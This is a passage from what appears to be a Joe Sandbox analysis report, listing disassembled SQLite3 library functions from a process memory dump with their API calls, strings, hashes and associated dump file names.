                                                    • Opcode Fuzzy Hash: faaf2aa58fa984701336af3892feb34707ba3759e2172f1538932955870c6dbc
                                                    • Instruction Fuzzy Hash: 4511F2B0908B569BC710AF69C18555EFBF5AF88324F20CA1DE8A887350D334D541CF52
                                                    Function 61E36D25 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E36ED5
                                                    • sqlite3_free.SQLITE3 ref: 61E36F01
                                                      • Part of subcall function 61E36CCB: sqlite3_vmprintf.SQLITE3 ref: 61E36CE4
                                                      • Part of subcall function 61E36CCB: sqlite3_mprintf.SQLITE3 ref: 61E36D02
                                                      • Part of subcall function 61E36CCB: sqlite3_free.SQLITE3 ref: 61E36D0E
                                                      • Part of subcall function 61E36CCB: sqlite3_free.SQLITE3 ref: 61E36D16
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_mprintf$sqlite3_vmprintf
                                                    • String ID: AND$NOT$xa
                                                    • API String ID: 966554101-279034770
                                                    • Opcode ID: 8a8c2b31d03907de16b44fec454c1c59f681575e028b6a46a557b677acb5ab29
                                                    • Instruction ID: dbbd88432d59bb37aaaa9c79abf48271fafc5a33bd27125f88e90ed4d15c6402
                                                    • Opcode Fuzzy Hash: 8a8c2b31d03907de16b44fec454c1c59f681575e028b6a46a557b677acb5ab29
                                                    • Instruction Fuzzy Hash: 755109B0A087A29BDB149FB6C58121EBAF5EFC9304F71C82DD49997340D734DA86CB52
                                                    Function 61E17B93 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_log
                                                    • String ID: ha$ha$sa
                                                    • API String ID: 632333372-2244070284
                                                    • Opcode ID: 69843f087fdd69c9a0f12775081e8f41b9eb69c40e5b59c0e487eded5a1a85e2
                                                    • Instruction ID: c5ca0edd743a8e0630def29989741d147a74557ccd7b5ebb9c8c7ba57a67adea
                                                    • Opcode Fuzzy Hash: 69843f087fdd69c9a0f12775081e8f41b9eb69c40e5b59c0e487eded5a1a85e2
                                                    • Instruction Fuzzy Hash: 3C5105B5A5DA09EFDB40CF1AC14275977A2F70F714F68C82AAC1A8B348D770DC818B52
                                                    Function 61E6BBB1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: invalid rootpage
                                                    • API String ID: 0-1762523506
                                                    • Opcode ID: 5a61af7cfbfc88d5f971109b8a6cdea22023a66a1cbafbcb419b40350794eee0
                                                    • Instruction ID: 00cafd991efb6cda9ffd5fc18ca92505cad169135932c76807a779978103835e
                                                    • Opcode Fuzzy Hash: 5a61af7cfbfc88d5f971109b8a6cdea22023a66a1cbafbcb419b40350794eee0
                                                    • Instruction Fuzzy Hash: 92419A74B442858FDB14CF79C480B9ABBF9AF89308F64C46DE8989B345DB30D941CB91
                                                    Function 61E2E3A5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 61E2E3C1
                                                    • sqlite3_value_text.SQLITE3 ref: 61E2E3CE
                                                    • sqlite3_value_text.SQLITE3 ref: 61E2E3DC
                                                    • sqlite3_result_text.SQLITE3 ref: 61E2E477
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_text$sqlite3_result_text
                                                    • String ID: i
                                                    • API String ID: 380805339-3865851505
                                                    • Opcode ID: f95084f25b57baf4b66a74d38261ec33e2a1ce0c6b87c402e721433789017f99
                                                    • Instruction ID: 9559b892366f2c95449c66171f3df98742f025d4f1d255014aa14abeccae82cf
                                                    • Opcode Fuzzy Hash: f95084f25b57baf4b66a74d38261ec33e2a1ce0c6b87c402e721433789017f99
                                                    • Instruction Fuzzy Hash: 8041E5B5A043559BCB10DFA9D89069DBBF5AF88314F24C82EE8A8D7350E734D8418F81
                                                    Function 61E0BA14 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_strglob
                                                    • String ID: $
                                                    • API String ID: 476814121-227171996
                                                    • Opcode ID: dd1cf2b7615aef4dc3f3eb03c6f23d474ef63dbfa2f3f3ec9f21b1e6ffe30ba6
                                                    • Instruction ID: 9b77f79746e7b089630f6321610e56b2304823d293c529c01db3eb7a9be47a4c
                                                    • Opcode Fuzzy Hash: dd1cf2b7615aef4dc3f3eb03c6f23d474ef63dbfa2f3f3ec9f21b1e6ffe30ba6
                                                    • Instruction Fuzzy Hash: EB21F469C0838689D7128BFAC9C035ABEF4FF8631BF28D55EC4D58B291E334D5A18742
                                                    Function 61E19967 Relevance: 7.7, APIs: 5, Instructions: 212COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_free.SQLITE3 ref: 61E199BF
                                                    • sqlite3_malloc.SQLITE3 ref: 61E19A55
                                                    • sqlite3_free.SQLITE3 ref: 61E19986
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    • sqlite3_free.SQLITE3 ref: 61E19BE4
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_enter
                                                    • String ID:
                                                    • API String ID: 165182205-0
                                                    • Opcode ID: 1b7e44b832492debdfc773ef745fa59b6eb64cedce56c9ec94a4773bacdec98c
                                                    • Instruction ID: bcf0b8f1b00230fbbac471a347e8107d8a82dd17034fbca11808239b42ba477b
                                                    • Opcode Fuzzy Hash: 1b7e44b832492debdfc773ef745fa59b6eb64cedce56c9ec94a4773bacdec98c
                                                    • Instruction Fuzzy Hash: 0BA1BE75D08219CBDB04CFA9C485ACDFBF5BF88314F25852AE859AB348E774A945CF80
                                                    Function 61E0533C Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_strnicmp
                                                    • String ID:
                                                    • API String ID: 1961171630-0
                                                    • Opcode ID: 78894e3eaa6a027dc97cd0a8028dece60d1268cce195ad7cb7ea5e694bf55259
                                                    • Instruction ID: df1f12e72a2859ae5a12c0a1f99e156b64d7389a3890013881fc9055af49df65
                                                    • Opcode Fuzzy Hash: 78894e3eaa6a027dc97cd0a8028dece60d1268cce195ad7cb7ea5e694bf55259
                                                    • Instruction Fuzzy Hash: B451D26154824589EB204ED8D4823F9BFA79F4230FFB9C81AD4A5D7251C27BC0BB8A43
                                                    Function 61E513EE Relevance: 7.7, APIs: 5, Instructions: 157COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E51699), ref: 61E51417
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E51699), ref: 61E515A4
                                                    • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E51699), ref: 61E515B6
                                                    • sqlite3_free.SQLITE3 ref: 61E515CD
                                                    • sqlite3_free.SQLITE3 ref: 61E515D5
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_mutex_leave$sqlite3_mutex_free
                                                    • String ID:
                                                    • API String ID: 2921195555-0
                                                    • Opcode ID: 6668c3821980a6ba005b62916d8d03ec78796282f91baf2ec2e65e321afd0553
                                                    • Instruction ID: 70ccdebb25a16ed697c96f7d0be7fa803769553c9d03ce7ccdcb343a6ccf923f
                                                    • Opcode Fuzzy Hash: 6668c3821980a6ba005b62916d8d03ec78796282f91baf2ec2e65e321afd0553
                                                    • Instruction Fuzzy Hash: 0F517E70A046928BDB50DFB9C88064ABBB1BF84318F29D56CCC599F305D735E866CBD0
                                                    Function 61E360EE Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mprintf$sqlite3_freesqlite3_malloc64sqlite3_realloc64
                                                    • String ID:
                                                    • API String ID: 4073198082-0
                                                    • Opcode ID: c3281f59ed2b4ac08a1f32b1d2e7403816ba17f610965e1ac0e023825d32e5a6
                                                    • Instruction ID: 0061d72e063ffea83067ca84fed3d21bf104225cb8f238b20a5b066e2f8c684a
                                                    • Opcode Fuzzy Hash: c3281f59ed2b4ac08a1f32b1d2e7403816ba17f610965e1ac0e023825d32e5a6
                                                    • Instruction Fuzzy Hash: 5F4158B0A04265DFDB04CF64C48465ABBF1FF88304F25C969EC598B34AD734EA51CBA1
                                                    Function 61E34210 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_result_null.SQLITE3 ref: 61E34232
                                                    • sqlite3_result_int.SQLITE3 ref: 61E34251
                                                    • sqlite3_result_int64.SQLITE3 ref: 61E34306
                                                    • sqlite3_result_double.SQLITE3 ref: 61E3433A
                                                    • sqlite3_malloc.SQLITE3 ref: 61E34377
                                                    • sqlite3_result_text.SQLITE3 ref: 61E34420
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mallocsqlite3_result_doublesqlite3_result_intsqlite3_result_int64sqlite3_result_nullsqlite3_result_text
                                                    • String ID:
                                                    • API String ID: 402655203-0
                                                    • Opcode ID: 8ca7462f907c8c9ac6c904370b9b78e2a08d52299e3fb7507fadcb7d6902035f
                                                    • Instruction ID: 608f3c3bc56e2b7b27a0d192572885cb02e710ace3b062af45ae1fbe359da44a
                                                    • Opcode Fuzzy Hash: 8ca7462f907c8c9ac6c904370b9b78e2a08d52299e3fb7507fadcb7d6902035f
                                                    • Instruction Fuzzy Hash: 3E414BB09092A59EDB10DFADD4946ADBBF1EBC9354F29C86ED494AB341C336C841CB12
                                                    Function 61E3622A Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_value_int.SQLITE3 ref: 61E3625C
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E36317
                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E36325
                                                    • sqlite3_free.SQLITE3 ref: 61E36347
                                                    • sqlite3_result_double.SQLITE3 ref: 61E36356
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_doublesqlite3_result_error_nomemsqlite3_value_int
                                                    • String ID:
                                                    • API String ID: 2195261611-0
                                                    • Opcode ID: 69767f4d1b85f8c373da554171cfa31fdbc1bd9b9dc1a9c60ee5dfd172749cfc
                                                    • Instruction ID: cac3ea5ea3b523601826e98591fd48196cd69ceb8c7e174b526514db649ca0b5
                                                    • Opcode Fuzzy Hash: 69767f4d1b85f8c373da554171cfa31fdbc1bd9b9dc1a9c60ee5dfd172749cfc
                                                    • Instruction Fuzzy Hash: A2310570E09699DADF01BFA1D8805DDBBB0FFC8744F258849E88167314E736C955CB86
                                                    Function 61E512DD Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 61E1318F: sqlite3_mutex_try.SQLITE3(?,?,?,61E1320F), ref: 61E1312F
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E51340
                                                    • sqlite3_mutex_free.SQLITE3 ref: 61E51381
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E51391
                                                    • sqlite3_free.SQLITE3 ref: 61E513C0
                                                    • sqlite3_free.SQLITE3 ref: 61E513DF
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                    • String ID:
                                                    • API String ID: 1894464702-0
                                                    • Opcode ID: 8816bfa311ddcbd9584cf63fb411cfe114c5d3c031b778e6418011c236c52e69
                                                    • Instruction ID: bbcfd40fc2a5c0ae4c9e72134ab807e12015a72b749a92e61c3b10a6ba262932
                                                    • Opcode Fuzzy Hash: 8816bfa311ddcbd9584cf63fb411cfe114c5d3c031b778e6418011c236c52e69
                                                    • Instruction Fuzzy Hash: E4313070B04A428BD754DFA9C4D051A7BF6BFC5748B25C46DD8448B71AEB32D852CB81
                                                    Function 61E1CEB2 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_malloc.SQLITE3 ref: 61E1CEC2
                                                      • Part of subcall function 61E18306: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17FE7,?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1830E
                                                    • memcmp.MSVCRT ref: 61E1CF34
                                                    • memcmp.MSVCRT ref: 61E1CF59
                                                    • memcmp.MSVCRT ref: 61E1CF8A
                                                    • memcmp.MSVCRT ref: 61E1CFB6
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: memcmp$sqlite3_initializesqlite3_malloc
                                                    • String ID:
                                                    • API String ID: 40721531-0
                                                    • Opcode ID: e81641acdc80f010407dfa09339502c5e308d6a6cdc13139e48fdcd17c5a4ecd
                                                    • Instruction ID: ee2211410323f0822fb5b8456f27500c7e657f78fa5a8188c5d8600e7892813e
                                                    • Opcode Fuzzy Hash: e81641acdc80f010407dfa09339502c5e308d6a6cdc13139e48fdcd17c5a4ecd
                                                    • Instruction Fuzzy Hash: D0315E71B082458BE7049FA9C58135EBAE5EFC8348F25C42DE848DB399D779D886CB42
                                                    Function 61E28BD3 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_log.SQLITE3 ref: 61E28C01
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,61E28D11), ref: 61E28C15
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E28D11), ref: 61E28C3D
                                                    • sqlite3_log.SQLITE3 ref: 61E28C5B
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E28D11), ref: 61E28C91
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
